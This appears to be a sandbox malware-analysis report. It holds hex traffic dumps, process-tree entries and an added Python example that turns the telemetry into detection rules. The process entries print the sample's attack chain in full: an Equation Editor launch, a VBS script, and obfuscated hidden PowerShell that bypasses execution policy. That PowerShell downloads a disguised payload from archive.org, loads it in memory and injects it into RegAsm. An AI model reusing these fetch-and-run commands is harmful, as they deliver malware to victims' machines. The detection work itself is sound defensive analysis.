                                                2024-09-11 18:22:22 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                                Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                                2024-09-11 18:22:22 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                                Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI

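The two sessions above (RegAsm.exe fetching geoplugin.net/json.gp, and a 32-bit powershell.exe pulling a 1.9 MB "image" from archive.org) are the kind of telemetry a detection engineer turns into rules. The following is an added example, not part of the Joe Sandbox report and not the sample's code: three heuristics run over constructed process and network events shaped after this report. PIDs 3644 and 3752 and the request lines come from the sessions above; all parent PIDs, the other PIDs and the RegAsm.exe command line are assumptions, since this excerpt does not show them.

```python
"""Heuristic detections for the behaviour recorded in the sessions above, run
over constructed process/network telemetry. Added example: not Joe Sandbox's
report logic and not the sample's code. Parent PIDs are assumptions."""
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    net: list = field(default_factory=list)  # [(dest_host, request_line), ...]


EQNEDT = "eqnedt32.exe"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def chain(procs, proc):
    """Ancestry of `proc` as image basenames, child first, stopping at an
    unknown parent or a PID loop."""
    by_pid = {p.pid: p for p in procs}
    out, seen = [], set()
    while proc is not None and proc.pid not in seen:
        seen.add(proc.pid)
        out.append(basename(proc.image))
        proc = by_pid.get(proc.ppid)
    return out


def detect(procs):
    """Return (rule, pid) findings for the three behaviours the report shows."""
    findings = []
    for p in procs:
        name = basename(p.image)
        ancestors = chain(procs, p)[1:]
        cl = p.cmdline.lower()
        # 1. A script host anywhere under EQNEDT32.EXE. Ancestry rather than
        #    direct parent, because Equation Editor is COM-activated: its parent
        #    is the DcomLaunch svchost, not WINWORD.EXE.
        if name in SCRIPT_HOSTS and EQNEDT in ancestors:
            findings.append(("equation_editor_spawns_script_host", p.pid))
        # 2. PowerShell that bypasses the execution policy and loads an assembly
        #    decoded from base64 in memory (the second-stage command line).
        if (name == "powershell.exe" and "-executionpolicy bypass" in cl
                and "frombase64string" in cl and "assembly]::load" in cl):
            findings.append(("powershell_base64_assembly_load", p.pid))
        # 3. RegAsm.exe is a .NET registration utility with no reason to
        #    geolocate the host; GET /json.gp on geoplugin.net is injected code.
        if name == "regasm.exe":
            for host, _request in p.net:
                if host.lower() == "geoplugin.net":
                    findings.append(("regasm_geoplugin_lookup", p.pid))
    return findings


# Constructed telemetry shaped after this report. PIDs 3644/3752 and the
# request lines are from the sessions above; other PIDs, all PPIDs and the
# RegAsm command line are made up for the example.
SAMPLE = [
    Proc(600, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    Proc(1000, 1, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         '"WINWORD.EXE" /Automation -Embedding'),
    Proc(1001, 600, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
         '"EQNEDT32.EXE" -Embedding'),
    Proc(1002, 1001, r"C:\Windows\SysWOW64\wscript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"'),
    Proc(2000, 1002, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -command $Codigo = '...';$OWjuxD = [system.Text.encoding]::Unicode.GetString("
         "[system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A')));"
         "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"),
    Proc(3644, 2000, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         'powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command '
         '"$commandBytes = [System.Convert]::FromBase64String($base64Command);'
         '$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)"',
         net=[("ia601706.us.archive.org", "GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1")]),
    Proc(3752, 3644, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "RegAsm.exe",
         net=[("geoplugin.net", "GET /json.gp HTTP/1.1")]),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule}: pid {pid}")
```

Rule 2 fires only on the second PowerShell instance: the first one also carries "-executionpolicy bypass" and FromBase64String in its command line, but it merely decodes and re-launches, while the second is the one that calls Assembly.Load. Rule 3 is the cheapest of the three to deploy as a proxy or DNS alert, since geoplugin.net lookups from anything other than a browser are rare in enterprise traffic.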


                                                Target ID:0
                                                Start time:14:22:12
                                                Start date:11/09/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f0b0000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:14:22:13
                                                Start date:11/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:14:22:16
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                                                Imagebase:0xca0000
                                                File size:141'824 bytes
                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:14:22:17
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? 
? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? 
?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? 
?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? 
? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?BT? ? ? ? ?E8? ? ? ? ?TgBV? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?y? ? ? ? ?DQ? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dk? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?D? ? ? ? ?? ? ? ? ?OQ? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?N? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0x1310000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:14:22:18
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                Imagebase:0x1310000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
